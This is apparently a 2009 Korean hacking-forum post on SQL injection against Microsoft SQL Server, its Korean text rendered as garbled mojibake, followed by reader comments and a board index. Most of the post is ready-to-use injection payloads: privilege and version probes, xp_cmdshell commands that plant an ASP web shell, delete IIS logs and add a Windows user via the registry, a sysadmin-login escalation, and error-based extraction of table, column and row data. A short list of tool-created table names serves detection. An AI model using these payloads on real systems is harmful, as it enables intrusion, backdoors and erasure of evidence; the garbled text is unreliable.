1581, 20/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   subroutine
   http://blog.naver.com/31337__
   sql ÀÎÁ§¼Ç °ø°Ý±â¹ý

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1177 [º¹»ç]


#########################################
# SQL Injection¿¡ ÀÇÇØ ÀÚÁÖ »ý¼ºµÇ´Â Å×ÀÌºí ¸í
#########################################
D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt,  jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN



########################################
# CHECK
#########################################

and 1=(select @@version) //version

and 1=(IS_SRVROLEMEMBER('sysadmin')) // Àüü ±ÇÇÑ(sysadmin£¬dbcreator£¬diskadmin£¬processadmin£¬serveradmin£¬setupadmin£¬securityadmin)
and 1=(IS_MEMBER('db_owner')) // ÇØ´ç DB ±ÇÇÑ

;declare @a int;--  // »ç¿ë¿©ºÎ
and 0<>db_name() // DB¸í
and user>0 // USER¸í

#########################################
# Áß±¹ ÇØÄ¿µéÀÌ ¾Ö¿ëÇÏ´Â °ø°ÝÆÐÅÏ
#########################################

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- // File
;exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' // LOG
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' // Registry

DROP TABLE kill_kk;CREATE TABLE kill_kk(subdirectory VARCHAR(100)À¬
depth VARCHAR(100)À¬[file] VARCHAR(100)) Insert kill_kk
exec master..xp_dirtree "D:/"À¬ 1À¬1-- // Table »ý¼º

DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

#########################################
# °ø°Ý ½Ã³ª¸®¿À
#########################################

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_5450] order by [id]) T order by [id] desc)>0


;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;CREATE TABLE [X_5450]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_5450](ResultTxt) exec master.dbo.xp_cmdshell 'dir c:';insert into [X_5450] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addsrvrolemember dir c:,sysadmin"'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addlogin dir c:,xiaoxue"'--

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

#########################################
# ±âŸ Äõ¸®¹®
#########################################

¸ðµç db¸í Äõ¸®Çϱâ
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

ƯÁ¤db¿¡¼­ »ç¿ëÀÚ°¡ ¸¸µç Å×À̺í¸í ºÒ·¯¿À±â
and 0<>(select top 1 name from snortids.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top ÇàÁõ°¡ name from .dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

Å×À̺íÀÇ Ä÷³Á¤º¸ ºÒ·¯¿À±â

ƯÁ¤ Å×À̺í°íÀ¯ID °¡Á®¿À±â(char(97)+char(98)+char(99)=abc) 1061578820
and 0<>(select count(*) from snortids.dbo.sysobjects where xtype='U' and name=char(97)+char(99)+char(105)+char(100)+char(95)+char(101)+char(118)+char(101)+char(110)+char(116) and uid>(str(id)))

Ä÷³¸í °¡Á®¿À±â
and 0<>(select top 1 name from snortids.dbo.syscolumns where id=1061578820)
and 0<>(select top 1 name from (select top ÇàÁõ°¡ name from snortids.dbo.syscolumns where id=1061578820 order by name asc) as table1 order by name desc)

µ¥ÀÌÅÍ °¡Á®¿À±â
and 0<>(select top 1 char(94)+Cast(sig_name as varchar(8000))+char(94) from SnortIDS..acid_event)
and 0<>(select top 1 char(94)+Cast(Ä÷³¸í as varchar(8000))+char(94) from SnortIDS..acid_event where Ä÷³¸í not in('À̹̾òÀº³»¿ë'))
and 0<>(select top 1 char(94)+Cast(Ä÷³¸í as varchar(8000))+char(94) from (select top Çà¼ö Ä÷³¸í from SnortIDS.dbo.acid_event order by Ä÷³¸í asc) as table1 order by Ä÷³¸í desc)

-subroutine-

  Hit : 19159     Date : 2009/01/11 01:52



    
BHM D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt, jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN -- ´ëºÎºÐÀÌ ä¹D,NB ¶õ Åø¿¡¼­ »ý¼ºµÈ Å×À̺í¸íÀ̱º...ÂÁÂÁ
2009/01/19  
zhuji90 ¹«½¼ ¾ð¾îÀΰ¡¿ä...? 2009/02/09  
ÆÒ´õ°íÀº ¤·¤µ¤·..½Å±âÇϳ׿ä 2009/07/10  
xodnr631 »ì¦ ÀÐÀ»¸¸ Çϳ׿ä, °¨»çÇÕ´Ï´Ù. 2010/09/24  
1201   [ÀÚÀÛ] ¹ÙÀÌ·¯½º/Æ®·ÎÀ̸ñ¸¶ ÇÁ·Î¼¼½º°¡ ÀÛ¾÷ °ü¸®ÀÚ È¤Àº tskill, taskkill ¿¡ ÀÇÇØ ²¨ÁöÁö ¾Ê´Â °æ¿ì[1]     TeamDeveloper
04/17 6337
1200   [ÀÚÀÛ teachercyber] µµ¸ÞÀÎÁÖ¼Ò·Î »ó´ë¹æ IPã±â(nslookup)[12]     teachercyber
07/30 8192
1199   [ÀÚÀÛ teachercyber] java¿¡¼­ Garbage Collection À̶õ?[2]     teachercyber
07/30 6217
1198   C¾ð¾î °­Á     te04041
11/23 9722
1197   ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹è¿ì±â 2[1]     sysopp2002
02/21 6847
1196   ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹è¿ì±â 1      sysopp2002
02/21 7324
1195     [re] sql ÀÎÁ§¼Ç º¹±¸Äõ¸®     subroutine
01/11 7994
  sql ÀÎÁ§¼Ç °ø°Ý±â¹ý[4]     subroutine
01/11 19158
1193   [Æß]ÇØÄ¿µéÀÇ ÈçÀûÁö¿ì´Â¹æ¹ý[28]     starztp
10/08 12547
1192   [Reverse Engineering in StarCraft] (1) ½ºÅ¸Å©·¡ÇÁÆ®³»ÀÇ TEXT¸¦ ¹Ù²ãº¸ÀÚ.[5]     stares
12/12 7257
1191   alsduddlrk12@hanmir.com ÇØÅ·°¡¸£ÃÄÁÖ½Ç ½º½ÂºÐ±¸ÇÕ´Ï´Ù...[6]     st9203
02/05 6202
1190   BOF ÇØ°á ¹«ÀÛÁ¤ µû¶óÇϱâ #2     ssuckies
04/12 10145
1189   BOF ÇØ°á ¹«ÀÛÁ¤ µû¶óÇϱâ #1[7]     ssuckies
04/12 14636
1188   ±×³àÀÇ Vulnerabilities¿¡ µû¸¥ Remote/local one night stand exploit.[2]     ssuckies
03/29 10281
1187   format stringÀ» À§ÇÑ ¸®ÅϾîµå·¹½º ±¸Çϱâ.[2]     ssuckies
02/08 10798
1186   ³»°¡ »ý°¢ÇÏ´Â ¿Ã¹Ù¸¥ ÄÄÇ»ÅÍ °øºÎ.[20]     ssonacy
03/21 8516
1185   ¸®´ª½º ¸í·É¾î ÇѲ¨¹ø¿¡(¼ÒÀ¯´Ô²¨)[11]     ssakura
07/07 12255
1184   trainer[6]     sporagame123
04/16 8795
1183   Ȥ½Ã³ª À©7 ¾²½Ã´ÂºÐµé ÅÚ³ÝÀÌ ¾ÈµÉ¶§[1]     sotjs13
01/06 6238
1182   ÃÊÂ¥Àε¥ ¾îµð¼­ºÎÅÍ ½ÃÀÛÇϳı¸¿ä?[5]     sotjs13
01/04 7433
[1]..[11][12][13][14][15][16][17][18][19] 20 ..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org